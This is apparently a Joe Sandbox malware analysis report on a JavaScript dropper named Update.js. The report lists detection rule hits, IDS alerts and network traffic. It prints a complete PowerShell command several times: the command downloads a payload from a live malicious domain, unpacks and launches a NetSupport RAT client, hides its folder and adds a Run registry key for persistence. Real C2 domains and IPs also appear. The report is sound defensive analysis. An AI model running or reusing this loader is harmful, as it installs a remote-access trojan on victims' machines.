C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 8.39.147.104, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2324, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49718
                                Sigma detected: Suspicious PowerShell Download - PoshModule
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 2d724c80-327a-44f1-8ea7-aafe971519b2 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; user Version = 5.1.19041.1682 Runspace ID = 24d5feab-35aa-46e9-a0b0-c5acf7616122 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 2d724c80-327a-44f1-8ea7-aafe971519b2 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe'
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 2324, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4196, ProcessName: svchost.exe

                                Remote Access Functionality

                                barindex
                                Sigma detected: Powershell drops NetSupport RAT client
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetFilename: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.LIC

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-10T16:33:38.861236+020020557951Exploit Kit Activity Detected192.168.2.6647971.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-10T16:33:39.408669+020020557981Exploit Kit Activity Detected192.168.2.6497188.39.147.104443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-10T16:33:47.058328+020020558011Domain Observed Used for C2 Detected192.168.2.6555881.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-10T16:33:47.624783+020020558021Domain Observed Used for C2 Detected192.168.2.64973379.141.161.172443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-10T16:33:31.132514+020028277451Malware Command and Control Activity Detected192.168.2.6497355.181.159.137443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://ipva2024-detransp.com/data.php?6891Avira URL Cloud: Label: phishing
                                Source: https://moneymoj.com/cdn-vs/update.php?88Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 8.39.147.104:443 -> 192.168.2.6:49718 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.161.172:443 -> 192.168.2.6:49733 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110BD520
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,13_2_1110F910
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1110BD70 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2055795 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (moneymoj .com) : 192.168.2.6:64797 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2055798 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (moneymoj .com) : 192.168.2.6:49718 -> 8.39.147.104:443
                                Source: Network trafficSuricata IDS: 2055801 - Severity 1 - ET MALWARE ZPHP CnC Domain in DNS Lookup (ipva2024-detransp .com) : 192.168.2.6:55588 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2055802 - Severity 1 - ET MALWARE ZPHP CnC Domain in TLS SNI (ipva2024-detransp .com) : 192.168.2.6:49733 -> 79.141.161.172:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49735 -> 5.181.159.137:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 8.39.147.104 443Jump to behavior
                                JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                                Source: Update.jsReturn value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: Update.jsReturn value : ['"send"']
                                Source: Update.jsReturn value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: Update.jsReturn value : ['"send"']
                                Source: Update.jsReturn value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: Update.jsReturn value : ['"send"']
                                Source: Update.jsReturn value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: Update.jsReturn value : ['"send"']
                                Source: Update.jsReturn value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: global trafficHTTP traffic detected: GET /data.php?6891 HTTP/1.1Host: ipva2024-detransp.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: HZ-US-ASBG HZ-US-ASBG
                                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                                Source: Joe Sandbox ViewASN Name: CFA-INSTITUTEUS CFA-INSTITUTEUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global trafficHTTP traffic detected: POST /cdn-vs/update.php?88 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: moneymoj.com
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /data.php?6891 HTTP/1.1Host: ipva2024-detransp.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: moneymoj.com
                                Source: global trafficDNS traffic detected: DNS query: ipva2024-detransp.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST /cdn-vs/update.php?88 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 0Host: moneymoj.com
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exeString found in binary or memory: http://127.0.0.1
                                Source: client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe, 00000000.00000003.2156349259.000001D0C871D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215978446.000001D0CD042000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210321815.000001D0CD165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211492021.000001D0CD18F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213825621.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214536981.000001D0CD1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209630899.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209860589.000001D0CD26D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210803679.000001D0CD041000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215539051.000001D0CD1A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214982606.000001D0CD04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156349259.000001D0C871D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://moneymoj.com/cdn-vs/update.php?88
                                Source: wscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160355900.000001D0C75F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2208938952.000001D0CCCC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 